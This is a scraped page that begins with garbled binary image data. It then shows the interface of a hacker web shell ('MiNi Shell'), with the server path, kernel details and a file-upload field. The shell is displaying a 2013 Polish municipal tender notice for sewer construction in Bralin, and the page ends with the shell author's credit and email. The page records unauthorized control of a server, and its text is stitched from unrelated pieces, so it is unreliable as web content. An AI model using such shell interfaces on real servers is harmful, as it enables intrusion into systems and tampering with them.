JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130219/27375-N-2013.html

<p class="kh_header"><b>Bralin: Rozbudowa sieci kanalizacji sanitarnej w Bralinie</b><br>
<b>Numer ogłoszenia: 27375 - 2013; data zamieszczenia: 19.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bralin , Rynek 3, 63-640 Bralin, woj. wielkopolskie, tel. (062)  7811201, faks (062)  7811202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bralin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa sieci kanalizacji sanitarnej w Bralinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. . Zmówieniem objęta jest budowa trzech osobnych odcinków sieci kanalizacji sanitarnej, objętych trzema osobnymi dokumentacjami projektowo - kosztorysowymi i trzema osobnymi pozwoleniami na budowę:
Lp.1 . opis :  Budowa kanalizacji w kwartale ulic Leśnej i Wrocławskiej . . lokalizacja: strona  zachodnio-północna  Bralina. . pozwolenie na budowę: nr 143-10 z dnia  14.04.2010 r. wydane przez Starostę Kępińskiego  . . tytuł projektu budowlanego: Projekt budowlany -  Rozbudowy sieci kanalizacji sanitarnej w miejscowości Bralin przy ul. Leśnej . . orientacyjny zakres: Rurociągi łącznie 2.352,5 mb;  przepompownia 1szt. Hp=5,5m;  N=1,7kW . . uwagi : Projekt jest realizowany z  dofinansowaniem  z środków unijnych  umowa o przyznanie pomocy nr 00083-6921-UM1500120/10  w ramach działania podstawowe usługi dla gospodarki i ludności wiejskiej objętego PROW na lata 2007-2013 zawarta w dniu 26.09.2011r.;;;;
L.p.2 .  opis : Budowa kanalizacji przy ulic Wrocławskiej i Kępińskiej - strona południowa .  lokalizacja: strona wschodnio-południowa Bralina . . pozwolenie na budowę: nr 142-10 z dnia  14.04.2010 r.  wydane przez Starostę Kępińskiego . . tytuł projektu budowlanego: Projekt budowlany  -  Rozbudowy sieci kanalizacji sanitarnej w miejscowości Bralin przy ul. Kępińskiej i Wrocławskiej. . orientacyjny zakres: Rurociągi łącznie 2.163,5 mb ; bez przepompowni .  uwagi: Projekt jest realizowany z  dofinansowaniem  z środków unijnych - umowa j.w.;;;;
L.p.3 .  opis : Budowa kanalizacji w drodze gruntowej - działka nr 1034 . . lokalizacja: strona centralna północna  Bralina . . pozwolenie na budowę: nr 12-2013 z dnia 16.01.2013 r.  wydane przez Starostę Kępińskiego . . tytuł projektu budowlanego: Projekt budowlano-wykonawczy  -  Budowa kanalizacji sanitarnej na działce nr 1034 w miejscowości Bralin . . orientacyjny zakres: Rurociągi łącznie 137 mb;  przepompownia 1szt. Hp=3,71m, N= 0,9 kW;;;;

2. Szczegółowy opis przedmiotu zamówienia: :

1)  Budowa kanalizacji w kwartale ulic Leśnej i Wrocławskiej . 
Kolektor grawitacyjny PVC DN 200; SDR34; SN8, dł.1557,5 mb; ;
Przykanaliki PVC DN160 SDR34; SN8, dł.170,5 mb = 40szt.; ;
Studnie betonowe fi 1000, szt.56; ;
Studnie typu TEGRA fi 425, szt.26; ;
Kolektor tłoczny PEHD 80; DN110; PN10; dł.624,5 mb; ;
Kompletna pompownia ścieków 1 szt. fiwewn 1200mm;  pompownia typu compakt w obudowie z kręgów betonowych fi 1800 mm, z pełną automatyką; Hstudni=5,24m Hp=5,5m; N=1,7kWx2; wraz z zagospodarowaniem i wyposażeniem terenu przepompowni; przyłącze kablowe WLZ; ;

2)   Budowa kanalizacji przy ulic Wrocławskiej i Kępińskiej - strona południowa.
Kolektor grawitacyjny PVC DN 200;  SDR 34; SN8, dł.1764 mb;
Przyłącza -PVC DN 160;  SDR 34; SN8, dł.399,5 mb = 29szt.;
Studnie betonowe fi 1000  szt.55;
Studnie typu TEGRA fi 425  szt.17;

3)   Budowa kanalizacji w drodze gruntowej - działka nr 1034 . 
Kolektor grawitacyjny PVC-U DN 200; SN-8; dł.97mb; ;
Studnie betonowe fi 1000 szt.3; ;
Przepompownia ścieków - z polimarabetonu 1szt. fiwewn1200mm;  Hstudni=3,2m;  Hp=3,71m; N=0,9kW x 2; ;
Rurociąg tłoczny PEHD100; SDR17; PN10; DN63 dł.40mb . 

4) Zamówieniem objęte są również: ;;
a)	zapewnienie kierownictwa budowy przez osoby uprawnione - wg wymogów Prawa budowlanego, oraz zapewnienie kierowników robót, jak określono we wzorze umowy,,
b)	zapewnienie pełnej obsługi geodezyjnej budowy na każdym jej etapie, w tym: wytyczenie obiektu w terenie, wskazanie granic gdyby zaszła taka konieczność, inwentaryzacja powykonawcza, sporządzenie map do celów projektowych na potrzeby opracowania projektu budowlanego zamiennego, gdyby zaszła taka konieczność,,
c)	zabezpieczenie bezpieczeństwa ruchu drogowego w czasie wykonywania robót, a w razie konieczności opracowanie projektu organizacji ruchu wraz z niezbędnymi uzgodnieniami i zezwoleniami,,
d)	uzyskanie zezwolenia na prowadzenie robót przypadających w pasie dróg publicznych oraz terenów zamkniętych: w pasie drogowym dróg powiatowych, w pasie drogi gminnej, oraz uregulowanie wszelkich opłat naliczanych z tego tytułu,,
e)	odtworzenie nawierzchni wszelkich dróg, chodników, parkingów do stanu poprzedniego, odtworzenie do stanu poprzedniego zagospodarowanych terenów zielonych,,
f)	dopełnienie wszelkich zaleceń, czynności, powiadomień wynikających z wszystkich uzgodnień branżowych projektu, w tym czynności formalno-prawnych,,
g)	przeprowadzenie :
- wszelkich wymaganych badań zagęszczenia gruntu i podłoża,
- wszelkich robót i czynności związanych z odbiorem, badaniem przedmiotu odbioru,
- rozruchu technologicznego przepompowni ścieków,
- wszelkich robót i czynności związanych z przekazaniem do eksploatacji (w tym opracowanie instrukcji eksploatacji, przeszkolenie pracowników Zamawiającego obsługujących przepompownie),
h)	jeżeli zaszłaby taka konieczność - opracowanie projektu budowlanego zamiennego i uzyskanie zmiany pozwolenia na budowę (w części, w której dokonuje się odstępstw od zatwierdzonego projektu budowlanego, niezależnie od przyczyn takich odstępstw), w tym ponowne uzgodnienia i zezwolenia, których konieczność uzyskania wynikła z powodu odstępstw od zatwierdzonego projektu budowlanego,
i)	sporządzenie dokumentacji powykonawczej,
j)	przeprowadzenie w imieniu inwestora czynności zawiadomienia o zakończeniu budowy w PINB w Kępnie i odbioru zgodnie z art. 54, 57 Prawa budowlanego, a gdyby zaszła taka konieczność uzyskanie pozwolenia na użytkowanie.

5)  Przy realizacji robót budowlanych wykonawca zobowiązany jest do:
a)	wykonania wszelkich robót budowlano-montażowych zgodnie z zasadami sztuki budowlanej,
b)	przy wykopach na terenie pól i łąk: zdejmowania warstwy ziemi humusowej na odkład, przy zasypkach odtworzenie wierzchniej warstwy humusowej,
c)	wywóz nadmiaru urobku poza teren placu budowy,
d)	kompletnego wyposażenia i kompletnego zagospodarowania terenu przepompowni ścieków,
e)	włączenia wybudowanych odcinków w istniejącą sieć kanalizacyjną -zgodnie z projektem.

Zamawiający wymaga udzielenia przez wykonawcę gwarancji na wykonane przez siebie roboty i użyte materiały na okres 3 lat licząc od daty odbioru końcowego. .

3.   Termin wykonania zamówienia: Wymagane terminy realizacji.
1)	termin zakończenia wszelkich robót budowlanych - 30 września 2013r.,
2)	termin ukończenia wszelkich procedur odbiorowych, przeprowadzenia odbioru końcowego i przekazania do eksploatacji całego przedsięwzięcia inwestycyjnego, w tym ukończenia czynności odbiorowych, których mowa w pkt B.3.4.j. SIWZ - do dnia 31 października 2013r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.00-6, 45.23.24.10-9, 45.23.24.23-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 40.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W okresie ostatnich 5 lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył:
a)	co najmniej trzy roboty sieciowe w zakresie infrastruktury podziemnej o długości, co najmniej 2000 mb każda w charakterze generalnego wykonawcy (przez roboty sieciowe w zakresie infrastruktury podziemnej rozumie się tu budowę kanalizacji, wodociągu lub gazociągu); ;
b)	co najmniej dwie roboty polegające na budowie kolektora sanitarnego grawitacyjnego o długości, co najmniej 1000 mb każda wraz z przykanalikami o ilości łącznej co najmniej 50 szt. w tych dwóch robotach ; ;
c)	co najmniej dwie roboty polegające na budowie kolektora sanitarnego tłocznego o długości co najmniej 500 mb każda, z rur PE zgrzewanych (doczołowo lub elektrooporowo) o średnicy nominalnej co najmniej DN 90 mm, ;
d)	budowę co najmniej dwóch przepompowni ścieków sanitarnych dwupompowych; ;
e)	co najmniej jedną robotę budowlaną o wartości co najmniej 1.000.000,-zł netto w charakterze generalnego wykonawcy, ;
Przy czym do wykazania spełniania poszczególnych warunków określonych w lit. a,b,c,d,e można wskazywać te same realizacje.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu realizacji przedmiotowego zamówienia będzie dysponował sprzętem w zakresie: : co najmniej dwie koparko-spycharki (lub dwie koparki i dwie spycharki), ponadto jedna koparka gąsienicowa, dwa samochody samowyładowcze, zestaw igłofiltrów, szalunki dla dwóch brygad, zgrzewarkę doczołową, dwa ubijaki spalinowe skoczkowe, dwie zagęszczarki (płyty wibracyjne).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Dysponuje osobą uczestniczą w wykonaniu przedmiotowego zamówienia zdolną do pełnienia funkcji kierownika budowy przy realizacji zamówienia (posiadającą uprawnienia budowlane sanitarnej oraz przynależącą do Polskiej Izby Inżynierów Budownictwa), o doświadczeniu zawodowym co najmniej 3 lata jako kierownik budowy na podobnych robotach. .
2)	Dysponuje osobami uczestniczącymi w wykonaniu przedmiotowego zamówienia odpowiedzialnymi za kierowanie robotami budowlanymi w branży:
a)	instalacji sanitarnych - o doświadczeniu zawodowym, co najmniej 3 lat, jako kierownik robót przy podobnych robotach - do ciągłego nadzorowania na budowie, ,
b)	instalacji elektrycznych, posiadającą uprawnienia budowlane bez ograniczeń w branży elektrycznej oraz przynależącą do PIIB (do nadzoru nad robotami branży elektrycznej i automatyki przy realizacji przepompowni wraz z zasilaniem WLZ). .
3)	Do wykonania przedmiotowego zamówienia dysponuje dwoma pracownikami fizycznymi - posiadającymi przygotowanie teoretyczne i praktyczne w zakresie wykonywania połączeń rurociągów z PE metodą zgrzewania doczołowego, potwierdzonego aktualnym zaświadczeniem lub certyfikatem wydanym przez instytucję lub podmiot do tego uprawniony.  .

4)	W celu realizacji przedmiotowego zamówienia w zakresie robót ziemnych i montażowych dysponuje co najmniej dwoma brygadami pracowników fizycznych po co najmniej 5 osób w każdej brygadzie, w tym co najmniej po jednym operatorze sprzętu w brygadzie (nie wlicza się w to brygad wykonujących prace montażowe przy przepompowni ścieków, wykonujących prace w zakresie odtwarzania nawierzchni drogowych, wykonujących przewierty i przeciski, wykonujących roboty branży elektrycznej, obsługi geodezyjnej).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponuje środkami finansowymi lub zdolnością kredytową wykonawcy na kwotę, co najmniej 600.000,- zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Oferta wykonawcy wg wzoru (zał. nr 1 do SIWZ). .
2)	Dowód wniesienia wadium -jak opisano w SIWZ. .
3)	Dokument potwierdzający, że osoby podpisujące ofertę są prawnie umocowane do reprezentowania wykonawcy - tylko w przypadku, gdy umocowanie takie nie wynika bezpośrednio z załączonego do oferty odpisu z właściwego rejestru. .
4)	Oświadczenie wykonawcy (wg wzoru -zał. nr 2 do SIWZ) o spełnianiu wymogów art.22 ust.1 ustawy. .
5)	Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo pełnomocnictwo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia (art. 23 ust.2) - tylko w przypadku, gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia (np. konsorcjum).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy (art.144 ust.1) w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy na warunkach określonych w załączniku nr 9 do siwz</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bralin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Bralin, ul. Rynek 3, 63-640 Bralin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2013 godzina 12:00, miejsce: Gmina Bralin, ul. Rynek 3, 63-640 Bralin, sekretariat - pokój nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest realizowany z  dofinansowaniem  z środków unijnych - umowa o przyznanie pomocy nr 00083-6921-UM1500120/10  w ramach działania podstawowe usługi dla gospodarki i ludności wiejskiej objętego PROW na lata 2007-2013 zawarta w dniu 26.09.2011r. - dotyczy zadań określonych jako Lp. 1 i Lp. 2. (może dotyczyć również zadania Lp. 3).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com